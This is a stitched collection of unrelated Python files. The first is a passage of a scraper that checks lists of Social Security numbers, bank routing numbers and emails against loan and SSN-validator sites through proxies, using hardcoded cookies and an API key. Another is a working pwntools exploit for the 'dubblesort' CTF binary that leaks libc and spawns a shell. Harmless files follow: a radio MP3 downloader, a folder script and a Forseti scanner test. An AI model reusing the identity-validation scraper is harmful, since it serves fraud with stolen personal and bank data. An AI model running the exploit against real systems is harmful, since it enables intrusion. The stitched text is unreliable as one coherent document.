'laravel_session':'eyJpdiI6IndYd2E2TDMwNUwyQmFCSEV6Q2R3dVE9PSIsInZhbHVlIjoiZEIxbnI3SjVSWmZnSTc2blBkTXBoVVdOaUZDTVBCYmhIa01XTzhnVURiam1GVUhVTVwvOSs3TVpcL1pZMkp1VGkyQUpaRERaWlNiVXVmcVcrRWh4c3NVdz09IiwibWFjIjoiZDVmZGZkZmU1NWM1NmZjMDM0NjI3NzFlOGYyMWYwNmJmY2ExZTEzYzA0YzM5MTMwZmFhNWJkOGUwNzU3NzI5ZiJ9',
}
# stick = int(round(time.time() * 1000))
return headers,cookies
def get_headers2():
headers = {
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'accept-encoding': 'gzip, deflate',
'accept-language': 'en-US,en;q=0.9',
'cache-control': 'no-cache',
'content-length': '29',
'content-type': 'application/x-www-form-urlencoded',
'origin': 'https://socialsecurityofficenear.me',
'pragma': 'no-cache',
'referer': 'https://socialsecurityofficenear.me/social-security-numbers/validator/',
'sec-fetch-mode': 'navigate',
'sec-fetch-site': 'same-origin',
'sec-fetch-user': '?1',
'upgrade-insecure-requests': '1',
'user-agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'
}
return headers
def validate_address(Address='',ZipCode=''):
headers = {
'Accept': '*/*',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin': 'https://cashrequestonline.com',
'Referer': 'https://cashrequestonline.com/Home/GetStarted?RequestedAmount=1000&ZipCode=85705',
'Sec-Fetch-Mode': 'cors',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36'
}
url_ = 'https://www.consumerconnecting.com/LeadProcessing/CheckAddress'
# Address='P.O Box 434'
# ZipCode=35068
headers['Referer'] = headers['Referer'].replace('85705',str(ZipCode))
data = {}
data['Address'] = Address
data['ZipCode'] = int(ZipCode)
# print('preparing to add proxy config:',data)
data_ = parse.urlencode(data)
s = requests.session()
try:
resp = s.post(url_,data=data_,headers=headers)
except Exception as e:
print(str(e))
return -1
# resp.encoding = 'utf-8' # 设置编码
resp.encoding='UTF-8'
# resp = requests.post(url_,data=data)
# print(resp.apparent_encoding)
resp_text = resp.text
print(resp_text)
data = json.loads(resp.text)
flag = 0
if data['StatusCode'] == 200:
# print('address alive')
flag = 1
else:
# print('address fake')
flag = 0
return flag
def get_first_headers():
headers = {
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'accept-encoding': 'gzip, deflate',
'accept-language': 'en-US,en;q=0.9',
'cache-control': 'no-cache',
'pragma': 'no-cache',
'sec-fetch-mode': 'navigate',
'sec-fetch-site': 'none',
'upgrade-insecure-requests': '1',
'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36'
}
return headers
def validate_phone(phone):
# phone = 2489710778
url = 'http://apilayer.net/api/validate?access_key=1bb8e33a938a9bb0a25b904d51775710&number=%d&country_code=US&format=1'%int(phone)
try:
resp = requests.get(url)
data = json.loads(resp.text)
except:
return -1
# print(resp.text)
# print(str(resp))
flag = 0
if data['valid'] == True:
# print('phone is valid')
flag = 1
else:
# print('phone is not valid')
flag = 0
return flag
def validate_routing(routing):
# routing = 421051540
url = 'http://www.consumerconnecting.com/misc/?responsetype=json&action=validatebankaba&bankaba=%d&uts=1582817828788&uid=d127367d-6053-4c65-b60b-fb53d7008f10&callback=jQuery2230839557435128814_1582817474953&_=1582817474957'%int(routing)
try:
resp = requests.get(url)
# data = json.loads(resp.text)
except Exception as e:
print(str(e))
return -1
print(resp.text)
resp_txt = resp.text
resp_text = resp_txt.replace('jQuery2230839557435128814_1582817474953(','').replace(')','')
data = json.loads(resp_text)
print(data['Result'])
# print(str(resp))
flag = 0
if data['Result'] == 1:
# print('routing is valid')
flag = 1
elif data['Result'] == 4:
# print('routing is not valid')
flag = 0
else:
print(data)
return flag
def validate_routing_10104(routing):
# routing = 421051540
url = 'https://gazelleloans.com/api/bank/?routing=%s'%routing
try:
resp = requests.get(url)
# data = json.loads(resp.text)
except Exception as e:
print(str(e))
return -1
print(resp.text)
# # print(str(resp))
# flag = 0
# if data['Result'] == 1:
# # print('routing is valid')
# flag = 1
# elif data['Result'] == 4:
# # print('routing is not valid')
# flag = 0
# else:
# print(data)
# return flag
def validate_routing_123(routing):
# routing = 421051540
url = 'https://www.123cashnow.com/longform/validateroutingnumber'
headers = {
# 'Accept': '*/*',
# 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
# 'Origin': 'https://cashrequestonline.com',
# 'Referer': 'https://cashrequestonline.com/Home/GetStarted?RequestedAmount=1000&ZipCode=85705',
# 'Sec-Fetch-Mode': 'cors',
'accept': 'application/json, text/javascript, */*; q=0.01',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-US,en;q=0.9',
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'cookie': 'PHPSESSID=ctlfvlc53mems2mrc6qk2h4gl6; ad=10222ce57df8c1ba4acd1e6f6bd182; campaign=; confpage=; site=123cashnow.com; source=1039-3392; affp=WjBt0c; action_tracking_id=1591712215404476000; leadtoro-_zldp=gn2ewDEDzKOiQl99yzfFgWkVed2erD0MyFKvqHENjItkA89K3yF8lS6uFTOdlRJzodoRkLyJC2Y%3D; leadtoro-_zldt=836fe2fc-4f74-499a-a2d0-b69035a3db4a; _ga=GA1.2.828820731.1591712221; _gid=GA1.2.279749699.1591712221; isiframeenabled=true; _lr_uf_-conhio=f359f8ba-087d-4467-ba78-cb826c99b63c; _lr_tabs_-conhio%2F123cashnow={%22sessionID%22:0%2C%22recordingID%22:%224-963859ec-7d0c-4c28-a4b3-8f324fb4ece0%22%2C%22lastActivity%22:%222020-06-09T14:17:58.929Z%22}; 6bdfac53cbfb648b7ebe7a1fe1b93f4d=%7B%22v%22%3A%225.5%22%2C%22a%22%3A2459678624%2C%22b%22%3A%224399b000f71eb53c1b2cb1191970c2ec%22%2C%22c%22%3A1591712281043%2C%22d%22%3A%2290975adc0caa4142da0b98eecda00352%22%2C%22e%22%3A%22%22%7D; _lr_hb_-conhio%2F123cashnow={%22heartbeat%22:%222020-06-09T14:19:58.845Z%22}',
'origin': 'https://www.123cashnow.com',
'referer': 'https://www.123cashnow.com/longform',
'sec-fetch-dest': 'empty',
'sec-fetch-mode': 'cors',
'sec-fetch-site': 'same-origin',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
'x-requested-with': 'XMLHttpRequest'
}
# url_ = 'https://www.consumerconnecting.com/LeadProcessing/CheckAddress'
# Address='P.O Box 434'
# ZipCode=35068
# headers['Referer'] = headers['Referer'].replace('85705',str(ZipCode))
data = {}
data['routing_number'] = str(routing['routing_number']).replace('.0','')
# print('preparing to add proxy config:',data)
data_ = parse.urlencode(data)
s = requests.session()
flag = -1
try:
resp = s.post(url,data=data_,headers=headers)
# resp = s.post(url,data=data_)
resp.encoding='UTF-8'
# resp = requests.post(url_,data=data)
# print(resp.apparent_encoding)
resp_text = resp.text
print(resp_text)
if resp_text == 'false':
flag = 0
elif resp_text == 'true':
flag = 1
else:
flag = 2
except Exception as e:
print(str(e))
flag = -1
# resp.encoding = 'utf-8' # 设置编码
sql_content = "UPDATE BasicInfo SET routing_alive = '%d' WHERE Basicinfo_Id = '%s'" % (flag,routing['BasicInfo_Id'])
# print(sql_content)
db.Execute_sql([sql_content])
return
def get_emails(file):
# file = r'..\res\email.txt'
emails = []
with open(file,'r') as f:
emails = f.readlines()
# print('First 10 emails')
# print(emails[0:10])
# print('Last 10 emails')
# print(emails[-10:])
emails = [email.replace('\n','') for email in emails]
return emails
def validate_email(email):
'''
Result:
1: email alive
2: email not alive
'''
# print('email:',email)
url = 'https://www.consumerconnecting.com/misc/?responsetype=json&action=validateemail&email=%s'%email
resp = requests.get(url)
# print(resp.text)
try:
res = json.loads(resp.text)
except:
return -1
# print("res['Result']",res['Result'])
flag = 0
if res['Result'] == 1:
# print('email alive')
flag = 1
else:
# print('email not exist')
flag = 0
# print(str(resp))
return flag
def validate_10088_email(email):
submit = {}
# port = '29050'
# submit['port_lpm'] = int(port)
# ip = '192.168.89.130'
# submit['ip_lpm'] = ip
submit['Mission_Id'] = 10000
# submit['ua'] = 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'
url = 'https://cashrequestonline.com/Home/GetStarted'
chrome_driver = Chrome_driver.get_chrome(None,headless=0)
# print('+++++++++++++========')
chrome_driver.get(url)
print('Loading finished')
xpath_email = '//*[@id="Email"]'
xpath_button = '/html/body/div[1]/div/section/div/div/div/form/div/div[2]/div[2]/div/div/a'
xpath_badinfo = '/html/body/div[1]/div/section/div/div/div/form/div/div[3]/div[1]/div/div[1]/p'
xpath_goodinfo = '/html/body/div[1]/div/section/div/div/div/form/div/div[3]/p'
good_info = 'How Much Do You Need?'
bad_info = 'Looks like we have your email on file.'
if 'This site can’t be reached' in chrome_driver.page_source:
print('net wrong')
chrome_driver.close()
chrome_driver.quit()
return
else:
print('net right')
WebDriverWait(chrome_driver,50).until(EC.visibility_of_element_located((By.XPATH,xpath_email)))
print('email ready')
chrome_driver.find_element_by_xpath(xpath_email).send_keys(email)
WebDriverWait(chrome_driver,50).until(EC.visibility_of_element_located((By.XPATH,xpath_button)))
print('button ready')
time.sleep(3)
chrome_driver.find_element_by_xpath(xpath_button).click()
flag = -1
for i in range(5):
if bad_info in chrome_driver.page_source:
if EC.visibility_of_element_located((By.XPATH,xpath_badinfo)):
flag = 0
print('bad info found...')
break
try:
chrome_driver.find_element_by_xpath(xpath_goodinfo).click()
print('find good info')
flag = 1
break
except:
pass
else:
sleep(1)
time.sleep(3000)
def validate_10088_email3(email):
url = 'http://www.consumerconnecting.com/misc/?responsetype=json&action=validateemail&email=email=%s'%email
headers = {
'Host': 'www.consumerconnecting.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate, br',
'Origin': 'https://cashrequestonline.com',
'Connection': 'keep-alive',
'Referer': 'https://cashrequestonline.com/GetStarted?PhoneHome=407-536-669&SSN=1172&PhoneHome=407-536-669&SSN=1172',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache'
}
response = requests.get(url=url,headers=headers)
print(response.status_code) # 打印状态码
print(response.url) # 打印请求url
print(response.headers) # 打印头信息
print(response.cookies) # 打印cookie信息
print(response.text) #以文本形式打印网页源码
print(response.content) #以字节流形式打印
def validate_10088_email2(email):
'''
Result:
3:in database
1: not in database
'''
# email = 'karlmalfeld@hotmail.com'
submit = {}
# port = '29050'
# submit['port_lpm'] = int(port)
# ip = '192.168.89.130'
# submit['ip_lpm'] = ip
submit['Mission_Id'] = 10000
submit['ua'] = 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'
url = 'https://cashrequestonline.com/Home/GetStarted'
# chrome_driver = Chrome_driver.get_chrome(submit,headless=0)
# # print('+++++++++++++========')
# chrome_driver.get(url)
# # sleep(5)
# cookies = chrome_driver.get_cookies()
# print(cookies)
# uid = ''
# for cookie in cookies:
# if 'value' in cookie:
# if 'uid' in cookie['value']:
# uid = cookie['value'][4:]
# break
uid = 'cdfb01b6-a06d-4a08-891b-bf2f9a11ce6d'
# time.sleep(3000)
print(uid)
if uid == '':
return
# print(cookies)
# chrome_driver.close()
# chrome_driver.quit()
stick = int(round(time.time() * 1000))
url2 = 'https://www.consumerconnecting.com/misc/?responsetype=json&action=campaignstatus&c=235100&email=%s&leadtypeid=9&mailsrc=field&callback=posting.isReturning&uts=%d&uid=%s'%(email,stick,uid)
# print(url)
# print('email:',email)
# proxy = 'socks5://%s:%s'%(ip,port)
session = requests.session()
session.headers.clear()
# session.proxies = {'http': proxy,
# 'https': proxy}
# resp = session.get(url2)
# print(resp.text)
# cookies = resp.cookies
# print('; '.join(['='.join(item) for item in cookies.items()]))
# session.headers = {
# 'accept': '*/*',
# 'accept-encoding': 'gzip, deflate, br',
# 'accept-language': 'en-US,en;q=0.9' ,
# 'user-agent': submit['ua'],
# 'referer':'https://cashrequestonline.com/Home/GetStarted',
# 'sec-fetch-dest': 'script',
# 'sec-fetch-mode': 'no-cors',
# 'sec-fetch-site': 'cross-site',
# 'cookies':'nlbi_1881145=uhcVW/vOEimurek2r9bA3gAAAAC25nhZdqUfiOHeBqrsI4hF; visid_incap_1881145=x9XGTYUrSdqiHLATjveXsQx6eV4AAAAAQUIPAAAAAACP/BnyUXHAbrbs8DweoIH6; incap_ses_543_1881145=Dj5Vc7EyMxJsH9S25x+JBwx6eV4AAAAA8H4+M3stSmG13v9MCmyzGw==; ASP.NET_SessionId=yalt4ld221w2l3qel5qt1rhu; hit=uid=cdfb01b6-a06d-4a08-891b-bf2f9a11ce6d; nlbi_1881146=+UhuZg+6p0qlKPbdzkbpqwAAAACZN5PH6zQyW/JZumRhh3mR; visid_incap_1881146=bQr57YJgRYKgrwdLNDlD5Qx6eV4AAAAAQUIPAAAAAAAFQFYbZ6gHQa0D/hCEQRaZ; incap_ses_1249_1881146=LH3oINjIIFgMB1rOIFdVEQx6eV4AAAAA8iNTffy1yd1Qqw5/QC4Qtg=='
# }
# cookies = {
# 'nlbi_1881145':'uhcVW/vOEimurek2r9bA3gAAAAC25nhZdqUfiOHeBqrsI4hF',
# 'visid_incap_1881145':'x9XGTYUrSdqiHLATjveXsQx6eV4AAAAAQUIPAAAAAACP/BnyUXHAbrbs8DweoIH6',
# 'incap_ses_543_1881145':'Dj5Vc7EyMxJsH9S25x+JBwx6eV4AAAAA8H4+M3stSmG13v9MCmyzGw==',
# 'ASP.NET_SessionId':'yalt4ld221w2l3qel5qt1rhu',
# 'hit':'cdfb01b6-a06d-4a08-891b-bf2f9a11ce6d',
# 'uid':'cdfb01b6-a06d-4a08-891b-bf2f9a11ce6d',
# 'nlbi_1881146':'+UhuZg+6p0qlKPbdzkbpqwAAAACZN5PH6zQyW/JZumRhh3mR',
# 'visid_incap_1881146':'bQr57YJgRYKgrwdLNDlD5Qx6eV4AAAAAQUIPAAAAAAAFQFYbZ6gHQa0D/hCEQRaZ',
# 'incap_ses_1249_1881146':'LH3oINjIIFgMB1rOIFdVEQx6eV4AAAAA8iNTffy1yd1Qqw5/QC4Qtg=='
# }
# for key in cookies:
# session.cookies.set(key, cookies[key])
try:
resp = session.get(url2)
# print(resp.text)
# resp = session.get(url)
print(resp.text)
response = resp.text.replace('posting.isReturning(','').replace(')','')
res = json.loads(response)
except Exception as e:
print(e)
return -1
print("res['Result']",res['Result'])
flag = 0
if res['Result'] == 1:
print('email not in 10088 db')
flag = 1
else:
print('email in 10088 db')
flag = 0
# print(str(resp))
return flag
def validate_ssn(ssn):
data = {}
data['ssn'] = str(ssn)
data['_token'] = 'IQCWfm8ze7Ktfn2GhkwoPcA9KRWTFtEuvH8ZmeE7'
# print('preparing to add proxy config:',data)
data_ = parse.urlencode(data)
headers,cookies = get_headers()
first_headers = get_first_headers()
url_ = 'https://www.ssnregistry.org/validate/'
# token = 'x0SExcS3MxhTKH0V20EeAcNbthGONNPGT8WBWOUJ'
# url_ = 'http://127.0.0.1:22999/api/proxies'
# url_ = 'http://%s:22999/api/proxies'%ip_lpm
# print(url_)
# try:
for i in range(1):
s = requests.session()
# resp = s.get(url_,headers=first_headers)
# resp_token = resp.text
# print(resp_token)
# a = resp_token.find('_token')
# b = resp_token.find('value',a)
# c = resp_token.find('">',b)
# _token = resp_token[b+7:c]
# print(_token)
# data['_token'] = _token
# print('resp.headers:',resp.headers)
# cookie_set = resp.headers['Set-Cookie']
# a = cookie_set.find('__cfduid=')
# b = cookie_set.find(';',a)
# cookies['__cfduid'] = cookie_set[a+9:b]
# cookies['T'] = str(int(cookies['__cfduid'][-10:])+5)
# print('__cfduid:',a,b)
# a = cookie_set.find('XSRF-TOKEN=')
# b = cookie_set.find(';',a)
# cookies['XSRF-TOKEN'] = cookie_set[a+11:b]
# print('XSRF-TOKEN:',a,b)
# a = cookie_set.find('laravel_session=')
# b = cookie_set.find(';',a)
# cookies['laravel_session'] = cookie_set[a+16:b]
# print('laravel_session:',a,b)
# print('cookies:',cookies)
resp = s.post(url_,data=data_,headers=headers,cookies = cookies)
# resp.encoding = 'utf-8' # 设置编码
resp.encoding='UTF-8'
# resp = requests.post(url_,data=data)
# print(resp.apparent_encoding)
resp_text = resp.text
# print(resp_text)
a = resp_text.find(str(ssn))
ssn_status = 'empty'
ssn_state = ''
if a!= -1:
b = resp_text.find('.</p>',a)
# print('a and b :',a,b)
content = 'Social Security number '+resp_text[a:b]
print('Content is :',content)
if 'invalid' in content:
ssn_status = 'invalid'
if 'for ' in content:
state = content[-2:]
print('State is:',state)
ssn_status = 'valid'
ssn_state = state
print(ssn_status,ssn_state,ssn)
ssn = str(ssn)+'.0'
sql_content = "UPDATE BasicInfo SET ssn_status = '%s' , ssn_state = '%s' WHERE ssn = '%s'" % (ssn_status,ssn_state,ssn)
# print(sql_content)
db.Execute_sql([sql_content])
# except Exception as e:
# print(str(e))
def validate_ssn2(ssn):
headers = get_headers2()
url = 'https://socialsecurityofficenear.me/social-security-numbers/validator/'
data = {
'area': '364',
'group': '87',
'series': '9625'
}
data_ = parse.urlencode(data)
s = requests.session()
s.get(url)
resp = s.post(url,headers=headers,data=data_)
resp_text = resp.text
print(resp_text)
print(resp.headers)
if 'No match found' in resp_text:
print('No match found')
else:
pass
def main():
for j in range(111):
account = get_account()
plan_id = account['plan_id']
traffics = read_plans(i)
print(traffics)
# print(len(traffics))
ip_lpm = account['IP']
for traffic in traffics:
# traffic['key'] = 'getaround'
traffic['port_lpm'] = get_port_random()
# traffic['Record'] = 3
# print('===========================')
# print(traffic['Country'],traffic['port_lpm'])
# luminati.add_proxy(traffic['port_lpm'],country=traffic['Country'],proxy_config_name='zone2',ip_lpm=ip_lpm)
add_proxy(traffic['port_lpm'],country=traffic['Country'],proxy_config_name='zone2',ip_lpm=ip_lpm)
requests = threadpool.makeRequests(traffic_test, traffics)
[pool.putRequest(req) for req in requests]
pool.wait()
print('finish sending traffic,sleep for 30')
def test():
emails = get_emails()
length = len(emails)
length = 30
flags = {}
flags['bad'] = 0
for i in range(length):
print('Email number:',i)
try:
flag = validate_10088_email(emails[i])
except:
flags['bad'] += 1
continue
if str(flag) not in flags:
flags[str(flag)] = 1
else:
flags[str(flag)] += 1
print(flags)
def test_ssn():
file = r'..\res\ssn.txt'
ssns = get_emails(file)
length = len(ssns)
print('total %d ssns to test'%length)
# ssns = ssns[0:20]
requests = threadpool.makeRequests(validate_ssn, ssns)
[pool.putRequest(req) for req in requests]
pool.wait()
pool = threadpool.ThreadPool(100)
def test_routing_123():
excel = 'Us_pd_native3'
routing = db.get_routing(excel)
# print(routing[0:10])
# return
requests = threadpool.makeRequests(validate_routing_123, routing)
[pool.putRequest(req) for req in requests]
pool.wait()
def get_ssn():
'''
empty
''
'''
file = r'..\res\ssn.txt'
ssn_empty,ssn_isnull = db.get_ssn()
# print(ssn_empty[0:3])
# print(ssn_isnull[0:3])
ssns_empty = [int(float(item['ssn'])) for item in ssn_empty]
ssns_isnull = [int(float(item['ssn'])) for item in ssn_isnull]
with open(file,'w') as f:
content = ''
for ssn in ssns_empty:
content += str(ssn)+'\n'
for ssn in ssns_isnull:
content += str(ssn)+'\n'
f.write(content)
def test_email():
ssn_status,ssn_state = '',''
ssn = 275238997
sql_content = "UPDATE BasicInfo SET ssn_status = '%s' and ssn_state = '%s' WHERE ssn = '%.1f'" % (ssn_status,ssn_state,float(ssn))
print(sql_content)
def test_email_10088():
email = 'jerry.griffin@cableone.net'
validate_email(email)
if __name__ == '__main__':
test_routing_123() |
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
elf = ELF('./dubblesort')
libc = ELF('/usr/lib32/libc-2.32.so')
# Memory locations
bin_sh = elf.bss() + 0x100
# Byte sequence alias
A4 = 4 * b'A'
def main():
proc = elf.process()
log.debug('You may attatch this process to gdb now.')
raw_input()
# Develop your exploit here
proc.recvuntil('What your name :')
proc.send(A4 * 4)
proc.recvuntil('Hello ' + 'AAAA' * 4)
libc__exit_funcs_lock = u32(proc.recv(4))
libc_base = libc__exit_funcs_lock - libc.sym['__exit_funcs_lock']
libc_system = libc_base + libc.sym['system']
libc_bin_sh = libc_base + list(libc.search(b'/bin/sh'))[0]
log.info('__exit_funcs_lock@libc: {}'.format(hex(libc__exit_funcs_lock)))
log.info('libc base: {}'.format(hex(libc_base)))
log.info('system@libc: {}'.format(hex(libc_system)))
log.info('bin_sh@libc: {}'.format(hex(libc_bin_sh)))
proc.recvuntil('sort :')
proc.sendline(str(35).encode())
# We must make sure our payload will remain
# in the correct order after being sorted.
payload = [0x30678 if i < 24 else 0xf0000000 for i in range(32)]
payload.append(libc_system) # ret
payload.append(libc_bin_sh) # system()'s ret addr
payload.append(libc_bin_sh) # system()'s 1st arg
for i in range(35):
proc.recvuntil('number : ')
# b'+' will be ignored by scanf("%u")
proc.sendline(b'+' if i == 24 else str(payload[i]).encode())
proc.interactive()
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
__author__ = 'Rodrigo Gomes'
#require https://github.com/Dirble/streamscrobbler-python
#agradecimento em especial a Håkan Nylén por disponibilizar
#o algoritmo streamscrobbler-python para extração de metadados
import urllib, time, os, urlparse,sys
from bs4 import BeautifulSoup
from streamscrobbler import streamscrobbler
streamscrobbler = streamscrobbler()
class Fareja():
def __init__(self):
self.aux = []
self.musica = list()
self.query_url = 'http://emp3world.com/search/%(query)s_mp3_download.html'
self.links = list()
self.status = []
if os.path.exists("Rock"):
os.chdir("Rock")
else:
os.mkdir("Rock")
os.chdir("Rock")
def radio(self, stream):
self.stream = stream
stationinfo = streamscrobbler.getServerInfo(self.stream)
try:
self.musica = str(dict(stationinfo.get("metadata"))['song'])
if self.musica != '89 Radio Rock - We rock Sampa since 1985!':
self.status = "Tocando: %s" % self.musica
else:
self.status = "Sem Musica -- Os Radialistas estão conversando Aguarde..."
time.sleep(10)
fareja.radio(self.stream)
except:
fareja.radio(self.stream)
if self.musica != self.aux and self.musica != '89 Radio Rock - We rock Sampa since 1985!' and self.musica is not None:
self.aux = self.musica
print self.status
self.procura(self.musica)
else:
fareja.radio(self.stream)
def procura(self, query):
self.links = []
print "Procurando Links Diretos de %s na Web" % query
query = (query.strip().lower())
request = urllib.urlopen(self.query_url % { 'query': query })
data = request.read()
text = data.decode('utf8', errors='ignore')
soup = BeautifulSoup(text)
for tag in soup.findAll('a', href=True):
tag['href'] = urlparse.urljoin(self.query_url, tag['href'])
if tag['href'].endswith(".mp3"):
self.links.append(tag['href'])
print "%i links para download" % len(self.links)
if len(self.links)==0:
print 'ERRO Sem Links diretos para download! Aguardando Próxima Música.\n\n'
fareja.radio(self.stream)
elif os.path.exists("Rock/"+query+".mp3"):
time.sleep(10)
fareja.radio(self.stream)
else:
try:
print "baixando: %s Aguarde." % query
urllib.urlretrieve(self.links[0],query+".mp3")
print "download de %s concluido" % self.links[0]
print "Aguardando a Próxima Música\n\n"
fareja.radio(self.stream)
except IOError:
urllib.urlretrieve(self.links[1],query+".mp3")
print "download de %s concluido" % self.links[1]
print "Aguardando a Próxima Música\n\n"
fareja.radio(self.stream)
finally:
print "Não foi Possível Baixar!\nAguardando Próxima Música"
print "Farejando a Rádio Aguarde..\n\n"
radios = ['http://www.webnow.com.br/streaming/autoplaylist/v1/radiorock.aac.pls','http://playerservices.streamtheworld.com/pls/SAOPAULO1021AAC.pls']
fareja = Fareja()
while True:
opc = int(input("0 - Farejar Radio Rock.\n1 - Farejar KissFM.\n"))
fareja.radio(radios[opc])
|
import os
def make_folders():
os.chdir('C:/Users/Intern/PycharmProjects/project1/folders')
os.mkdir('folder1')
os.mkdir('folder1/folder11')
os.mkdir('folder1/folder11/folder111')
os.mkdir('folder1/folder12')
os.mkdir('folder2')
os.mkdir('folder2/folder21')
open('a_file1.txt', 'a').close()
open('folder1/a_file2.txt', 'a').close()
open('folder1/a_file3.txt', 'a').close()
open('folder1/folder11/a_file4.txt', 'a').close()
open('folder2/a_file5.txt', 'a').close()
open('folder2/folder21/a_file6.txt', 'a').close()
open('folder1/folder12/b_file1.txt', 'a').close()
open('folder2/b_file2.txt', 'a').close()
open('folder2/folder21/b_file3.txt', 'a').close()
with open('c_file1.txt', 'a') as f:
f.write("texttexttext")
open('folder1/c_file2.txt', 'a').close()
open('folder1/folder11/c_file3.txt', 'a').close()
open('folder1/folder11/folder111/c_file4.txt', 'a').close()
open('folder2/folder21/c_file5.txt', 'a').close()
if __name__ == "__main__":
make_folders()
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""IAP scanner test"""
from datetime import datetime
import json
import mock
import unittest
import yaml
from google.cloud.security.common.gcp_type import backend_service as backend_service_type
from google.cloud.security.common.gcp_type import firewall_rule as firewall_rule_type
from google.cloud.security.common.gcp_type import instance_group as instance_group_type
from google.cloud.security.common.gcp_type import instance_group_manager as instance_group_manager_type
from google.cloud.security.common.gcp_type import instance as instance_type
from google.cloud.security.common.gcp_type import instance_template as instance_template_type
from google.cloud.security.common.gcp_type import project as project_type
from google.cloud.security.common.gcp_type import network as network_type
from google.cloud.security.scanner.scanners import iap_scanner
from tests.unittest_utils import ForsetiTestCase
from tests.unittest_utils import get_datafile_path
class FakeProjectDao(object):
def get_project(self, project_id, snapshot_timestamp=0):
return project_type.Project(project_id=project_id)
class FakeOrgDao(object):
def find_ancestors(self, resource_id, snapshot_timestamp=0):
return []
class IapScannerTest(ForsetiTestCase):
def network_port(self, port_number, project='foo', network='default'):
return iap_scanner.NetworkPort(
network=network_type.Key.from_args(project_id=project,
name=network),
port=port_number)
def tearDown(self):
self.org_patcher.stop()
self.project_patcher.stop()
def setUp(self):
self.fake_utcnow = datetime(
year=1900, month=1, day=1, hour=0, minute=0, second=0,
microsecond=0)
# patch the daos
self.org_patcher = mock.patch(
'google.cloud.security.common.data_access.'
'org_resource_rel_dao.OrgResourceRelDao')
self.mock_org_rel_dao = self.org_patcher.start()
self.mock_org_rel_dao.return_value = FakeOrgDao()
self.project_patcher = mock.patch(
'google.cloud.security.common.data_access.'
'project_dao.ProjectDao')
self.mock_project_dao = self.project_patcher.start()
self.mock_project_dao.return_value = FakeProjectDao()
self.fake_scanner_configs = {'output_path': 'gs://fake/output/path'}
self.scanner = iap_scanner.IapScanner(
{}, {}, '',
get_datafile_path(__file__, 'iap_scanner_test_data.yaml'))
self.scanner.scanner_configs = self.fake_scanner_configs
self.scanner._get_backend_services = lambda: self.backend_services.values()
self.scanner._get_firewall_rules = lambda: self.firewall_rules.values()
self.scanner._get_instances = lambda: self.instances.values()
self.scanner._get_instance_groups = lambda: self.instance_groups.values()
self.scanner._get_instance_group_managers = lambda: self.instance_group_managers.values()
self.scanner._get_instance_templates = lambda: self.instance_templates.values()
self.backend_services = {
# The main backend service.
'bs1': backend_service_type.BackendService(
project_id='foo',
name='bs1',
backends=json.dumps(
[{'group': ('https://www.googleapis.com/compute/v1/'
'projects/foo/regions/wl-redqueen1/'
'instanceGroups/ig_managed')},
{'group': ('https://www.googleapis.com/compute/v1/'
'projects/foo/regions/wl-redqueen1/'
'instanceGroups/ig_unmanaged')},
]),
iap=json.dumps({'enabled': True}),
port=80,
port_name='http',
),
# Another backend service that connects to the same backend.
'bs1_same_backend': backend_service_type.BackendService(
project_id='foo',
name='bs1_same_backend',
backends=json.dumps(
[{'group': ('https://www.googleapis.com/compute/v1/'
'projects/foo/regions/wl-redqueen1/'
'instanceGroups/ig_managed')},
]),
port=80,
),
# A backend service with a different port (so, not an alternate).
'bs1_different_port': backend_service_type.BackendService(
project_id='foo',
name='bs1_different_port',
backends=json.dumps(
[{'group': ('https://www.googleapis.com/compute/v1/'
'projects/foo/regions/wl-redqueen1/'
'instanceGroups/ig_managed')},
]),
port=81,
),
# Various backend services that should or shouldn't be alts.
'bs1_same_instance': backend_service_type.BackendService(
project_id='foo',
name='bs1_same_instance',
backends=json.dumps(
[{'group': ('https://www.googleapis.com/compute/v1/'
'projects/foo/regions/wl-redqueen1/'
'instanceGroups/ig_same_instance')},
]),
port=80,
),
'bs1_different_network': backend_service_type.BackendService(
project_id='foo',
name='bs1_different_network',
backends=json.dumps(
[{'group': ('https://www.googleapis.com/compute/v1/'
'projects/foo/regions/wl-redqueen1/'
'instanceGroups/ig_different_network')},
]),
port=80,
),
'bs1_different_instance': backend_service_type.BackendService(
project_id='foo',
name='bs1_different_instance',
backends=json.dumps(
[{'group': ('https://www.googleapis.com/compute/v1/'
'projects/foo/regions/wl-redqueen1/'
'instanceGroups/ig_different_instance')},
]),
port=80,
),
}
